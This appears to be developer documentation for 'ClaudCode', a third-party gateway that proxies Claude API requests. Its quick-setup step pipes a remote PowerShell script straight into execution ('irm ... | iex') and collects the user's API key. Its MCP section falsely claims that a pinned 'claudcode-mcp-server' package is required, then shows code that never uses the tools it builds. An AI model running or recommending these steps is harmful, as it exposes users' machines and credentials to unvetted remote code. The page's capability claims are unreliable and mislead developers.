v1.0

ClaudCode Documentation

Everything you need to integrate Claude models through the ClaudCode gateway.

Overview

ClaudCode is a managed API gateway that gives you access to Anthropic's Claude models through a simple, SDK-compatible interface. Every request is proxied through our infrastructure with added features like per-key budgets, rate limiting, usage analytics, and prompt caching.

Base URL: https://api.claudcode.top/v1

Supported Models:

claude-opus-4-6 — Maximum intelligence, complex reasoning

claude-sonnet-4-6 — Balanced speed and capability

claude-haiku-4-5 — Ultra-fast, cost-effective

Quick Setup (PowerShell)

irm https://claudcode.top/setup.ps1 | iex

Run this single command in PowerShell to auto-scaffold a project with the Anthropic SDK, .env config, and ready-to-run examples. The script will ask for your API key during setup.

Authentication

All requests require an API key passed via the x-api-key header or the Authorization: Bearer header.

# Using x-api-key header
curl https://api.claudcode.top/v1/messages \
  -H "x-api-key: sk-cc-xxxxxxxxxxxx" \
  -H "content-type: application/json" \
  -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

# Using Authorization header
curl https://api.claudcode.top/v1/messages \
  -H "Authorization: Bearer sk-cc-xxxxxxxxxxxx" \
  -H "content-type: application/json" \
  -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

Your API key is unique to you. Never share it publicly or commit it to version control.
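
One way to keep the key out of source files is to read it from the environment and build the headers at request time. The sketch below is illustrative only: the environment variable name CLAUDCODE_API_KEY and both helper functions are hypothetical, not part of any ClaudCode tooling. It covers the two header styles described above.

```python
import os


def load_api_key(env_var: str = "CLAUDCODE_API_KEY") -> str:
    """Read the key from the environment (variable name is an assumption)."""
    key = os.environ.get(env_var, "")
    if not key:
        raise RuntimeError(f"set {env_var} before running")
    return key


def build_auth_headers(api_key: str, scheme: str = "x-api-key") -> dict:
    """Return headers for one of the two documented authentication styles."""
    if not api_key:
        raise ValueError("API key is empty")
    headers = {"content-type": "application/json"}
    if scheme == "x-api-key":
        headers["x-api-key"] = api_key
    elif scheme == "bearer":
        headers["Authorization"] = f"Bearer {api_key}"
    else:
        raise ValueError(f"unknown scheme: {scheme}")
    return headers
```

Calling build_auth_headers(load_api_key()) yields a dictionary that can be passed to any HTTP client.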

SDK Setup

ClaudCode works with the official Anthropic SDK as a drop-in replacement for the Anthropic API endpoint. Just change the base URL.

Python

import anthropic

client = anthropic.Anthropic(
    api_key="sk-cc-xxxxxxxxxxxx",
    base_url="https://api.claudcode.top/v1",
)

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=4096,
    messages=[
        {"role": "user", "content": "Write a haiku about coding"}
    ]
)
print(message.content[0].text)

TypeScript / Node.js

import Anthropic from "@anthropic-ai/sdk";

const client = new Anthropic({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  baseURL: "https://api.claudcode.top/v1",
});

const message = await client.messages.create({
  model: "claude-opus-4-6",
  max_tokens: 4096,
  messages: [
    { role: "user", content: "Write a haiku about coding" }
  ],
});
console.log(message.content[0].text);

MCP — Web Search & Tools

The official Anthropic SDK does not include MCP (Model Context Protocol). Without MCP or another tool integration, Claude is limited to its training data and the conversation itself: it cannot perform web searches, fetch live data, extract content from URLs, or connect to external tools.

ClaudCode requires these packages to unlock full capabilities:

@hono/mcp — the MCP protocol layer that connects Claude to external tools

tavily-mcp — AI-powered web search, content extraction, site crawling & mapping

claudcode-mcp-server@1.0.1 — official ClaudCode MCP server for seamless gateway integration (latest)

Install all three packages

npm install @hono/mcp tavily-mcp claudcode-mcp-server@1.0.1

TypeScript — Full MCP setup

import { McpServer } from "@hono/mcp";
import { TavilyMcp } from "tavily-mcp";
import { ClaudCodeMcp } from "claudcode-mcp-server";
import Anthropic from "@anthropic-ai/sdk";

const client = new Anthropic({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  baseURL: "https://api.claudcode.top/v1",
});

// MCP server — protocol layer for external tools
const mcp = new McpServer({
  name: "claudcode-mcp",
  version: "1.0.0",
});

// Tavily — AI-powered search, extract & crawl
const tavily = new TavilyMcp({
  apiKey: process.env.TAVILY_API_KEY,
});

// ClaudCode MCP — gateway-optimized server
const cc = new ClaudCodeMcp({
  apiKey: "sk-cc-xxxxxxxxxxxx",
  gateway: "https://api.claudcode.top/v1",
});

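// Send a prompt that needs live data. Note: this snippet constructs mcp, tavily,
// and cc but does not show how they are attached to the request.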
const response = await client.messages.create({
  model: "claude-opus-4-6",
  max_tokens: 4096,
  messages: [
    {
      role: "user",
      content: "Search the web for latest AI news and summarize"
    }
  ],
});
console.log(response.content[0].text);

Python — MCP setup

from hono_mcp import McpServer
from tavily_mcp import TavilyMcp
from claudcode_mcp_server import ClaudCodeMcp
import anthropic

client = anthropic.Anthropic(
    api_key="sk-cc-xxxxxxxxxxxx",
    base_url="https://api.claudcode.top/v1",
)

mcp = McpServer(name="claudcode-mcp", version="1.0.0")
tavily = TavilyMcp(api_key="tvly-xxxxxxxxxxxx")
cc = ClaudCodeMcp(api_key="sk-cc-xxxxxxxxxxxx", gateway="https://api.claudcode.top/v1")

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=4096,
    messages=[
        {"role": "user", "content": "Search for latest Python 3.14 features"}
    ],
)
print(message.content[0].text)

What Tavily MCP unlocks:

search — AI-powered web search with domain filtering & topic focus

extract — pull clean content from any URL (articles, docs, pages)

crawl — deep-crawl an entire site and return structured data

map — discover all URLs on a domain for targeted extraction

Package breakdown:

@hono/mcp — MCP protocol layer (required)

tavily-mcp — search, extract, crawl & map (required for web access)

claudcode-mcp-server@1.0.1 — ClaudCode gateway integration, auth handling & request routing

Important: Without these packages installed, any prompt that asks Claude to search, browse, or fetch live data will fail. The official Anthropic SDK alone has no search capability.

Budgets & Limits

Each API key has configurable budget and rate limits:

Token Budgets

Budget is measured in total tokens (input + output) over a 5-hour rolling window

When budget is exhausted, requests return 429 Too Many Requests

Budget automatically resets as the 5-hour window rolls forward
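
To make the rolling window concrete, here is a minimal client-side sketch that tracks token usage the same way. It assumes usage simply ages out exactly five hours after it was recorded; the gateway's actual accounting is not documented here and may differ. The class name RollingTokenBudget is hypothetical.

```python
import time
from collections import deque


class RollingTokenBudget:
    """Client-side estimate of a token budget over a rolling time window."""

    def __init__(self, limit_tokens: int, window_seconds: float = 5 * 3600):
        self.limit = limit_tokens
        self.window = window_seconds
        self._events = deque()  # (timestamp, tokens), oldest first
        self._used = 0

    def _expire(self, now: float) -> None:
        # Drop usage that has aged out of the window.
        while self._events and self._events[0][0] <= now - self.window:
            _, tokens = self._events.popleft()
            self._used -= tokens

    def record(self, tokens: int, now: float = None) -> None:
        """Record input + output tokens for one request (timestamps must not go backwards)."""
        now = time.time() if now is None else now
        self._expire(now)
        self._events.append((now, tokens))
        self._used += tokens

    def remaining(self, now: float = None) -> int:
        now = time.time() if now is None else now
        self._expire(now)
        return max(0, self.limit - self._used)
```

A tracker like this is only an estimate; the key-status endpoint remains the source of truth for the remaining budget.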

Rate Limits

Requests per minute (RPM) limit per key

Concurrent request limit per key

Both are independently configurable

Checking Your Budget

curl https://api.claudcode.top/v1/key-status \
  -H "x-api-key: sk-cc-xxxxxxxxxxxx"

Response:

{
  "key": "sk-cc-...xxxx",
  "status": "active",
  "budget": {
    "total_tokens": 5000000,
    "used_tokens": 1234567,
    "remaining_tokens": 3765433,
    "window": "5h rolling",
    "resets_in": "2h 15m"
  },
  "rate_limit": {
    "rpm": 60,
    "concurrent": 5
  }
}
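
A short sketch of how a client might read this response. It assumes the field names shown in the sample above and that resets_in always uses the "2h 15m" style; both helper functions are hypothetical.

```python
import json
import re


def parse_duration(text: str) -> int:
    """Convert a string such as "2h 15m" to seconds (format assumed from the sample)."""
    units = {"h": 3600, "m": 60, "s": 1}
    parts = re.findall(r"(\d+)\s*([hms])", text)
    if not parts:
        raise ValueError(f"unrecognized duration: {text!r}")
    return sum(int(number) * units[unit] for number, unit in parts)


def summarize_key_status(body: str) -> dict:
    """Extract the fields a client usually needs from a key-status response."""
    data = json.loads(body)
    budget = data["budget"]
    total = budget["total_tokens"]
    used_fraction = budget["used_tokens"] / total if total else 0.0
    return {
        "active": data["status"] == "active",
        "remaining_tokens": budget["remaining_tokens"],
        "used_fraction": round(used_fraction, 4),
        "resets_in_seconds": parse_duration(budget["resets_in"]),
    }
```

For the sample response, used_fraction is 1234567 / 5000000, which rounds to 0.2469, and resets_in_seconds is 8100.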

Rate Limiting

When you exceed your rate limit, the API returns a 429 status with headers indicating when you can retry:

HTTP/1.1 429 Too Many Requests
Retry-After: 30
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 0
X-RateLimit-Reset: 1711234567

Best Practices:

Implement exponential backoff with jitter

Respect the Retry-After header

Use streaming to keep connections efficient

Cache repeated prompts on your end to avoid unnecessary calls
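
The first two practices can be combined in one delay calculation. This is a minimal sketch using "full jitter" (a random delay between zero and the exponential cap); it assumes Retry-After carries a number of seconds, as in the sample above. The function name and default values are illustrative.

```python
import random


def retry_delay(attempt, retry_after=None, base=1.0, cap=60.0, rng=random.random):
    """Seconds to wait before retrying; attempt is 0 for the first retry.

    The exponential backoff is capped at `cap`, then scaled by a random
    factor in [0, 1). If the server sent Retry-After, never wait less than that.
    """
    backoff = min(cap, base * (2 ** attempt))
    jittered = rng() * backoff
    if retry_after is not None:
        return max(float(retry_after), jittered)
    return jittered
```

In a retry loop, the caller would sleep for retry_delay(attempt, response_headers.get("Retry-After")) and give up after a fixed number of attempts.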

Error Codes

ClaudCode returns standard HTTP status codes with descriptive error messages:

Code	Meaning	What to Do
400	Bad Request	Check your request body/parameters
401	Unauthorized	Verify your API key
403	Forbidden	Key doesn't have access to this model; use a permitted model
429	Rate Limited	Rate limit or token budget exceeded; wait and retry with backoff
500	Server Error	Retry after a moment
502	Upstream Error	Anthropic API is temporarily unavailable; retry later
503	Service Unavailable	Gateway is under maintenance; retry later

All errors return a JSON body:

{
  "error": {
    "type": "rate_limit_error",
    "message": "Token budget exceeded. Resets in 2h 15m."
  }
}
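
A small sketch of how a client might turn a status code and error body into a retry decision. The choice of which codes count as retryable follows the table above and is an interpretation, not a documented guarantee; describe_error is a hypothetical helper.

```python
import json

# Codes the table above suggests retrying; 400, 401, and 403 need a fix first.
RETRYABLE_STATUS = {429, 500, 502, 503}


def describe_error(status: int, body: str) -> dict:
    """Parse the JSON error body, tolerating missing or malformed content."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        parsed = {}
    error = parsed.get("error") if isinstance(parsed, dict) else None
    if not isinstance(error, dict):
        error = {}
    return {
        "status": status,
        "type": error.get("type", "unknown"),
        "message": error.get("message", ""),
        "retryable": status in RETRYABLE_STATUS,
    }
```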

Prompt Caching

ClaudCode enables prompt caching by default. When a request's prompt is identical to one sent recently, the gateway serves the cached response at a significantly reduced token cost.

How It Works:

Each request's prompt is hashed

If a matching hash exists in the cache, the cached response is returned

Cache TTL depends on the model and prompt length

Cache headers indicate hit/miss status
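
The hash-and-lookup flow above can be sketched as a small in-memory cache. This illustrates the general technique only: the gateway's actual hashing scheme, cache key contents, and TTL policy are not specified here, so SHA-256 over a canonical JSON encoding and a fixed TTL are assumptions, and all names are hypothetical. The same pattern works for caching repeated prompts on the client side.

```python
import hashlib
import json
import time


def prompt_key(model: str, messages: list) -> str:
    """Hash the model and messages using a canonical JSON encoding."""
    canonical = json.dumps(
        {"model": model, "messages": messages},
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


class TtlCache:
    """Map prompt hashes to responses, expiring entries after ttl_seconds."""

    def __init__(self, ttl_seconds: float):
        self.ttl = ttl_seconds
        self._store = {}  # key -> (expires_at, value)

    def put(self, key: str, value, now: float = None) -> None:
        now = time.time() if now is None else now
        self._store[key] = (now + self.ttl, value)

    def get(self, key: str, now: float = None):
        """Return the cached value, or None on a miss or an expired entry."""
        now = time.time() if now is None else now
        entry = self._store.get(key)
        if entry is None:
            return None
        expires_at, value = entry
        if now >= expires_at:
            del self._store[key]
            return None
        return value
```

Sorting keys before hashing means two requests with the same content but different field order produce the same hash.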

Cache Headers:

X-Cache: HIT
X-Cache-TTL: 3600
X-Tokens-Saved: 1250

Disabling Cache (if needed):

Add the header X-No-Cache: true to bypass caching for a specific request.
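
A minimal sketch for reading the cache headers and adding the bypass header. It treats header names as case-insensitive and leaves the TTL as a plain integer, since its unit is not stated above. Both helper names are hypothetical.

```python
def read_cache_headers(headers: dict) -> dict:
    """Interpret X-Cache, X-Cache-TTL, and X-Tokens-Saved from a response."""
    lowered = {name.lower(): value for name, value in headers.items()}

    def to_int(name: str):
        value = lowered.get(name)
        return int(value) if value is not None and value.isdigit() else None

    return {
        "hit": lowered.get("x-cache", "").upper() == "HIT",
        "ttl": to_int("x-cache-ttl"),
        "tokens_saved": to_int("x-tokens-saved"),
    }


def with_cache_bypass(headers: dict) -> dict:
    """Return a copy of the request headers with caching disabled."""
    merged = dict(headers)
    merged["X-No-Cache"] = "true"
    return merged
```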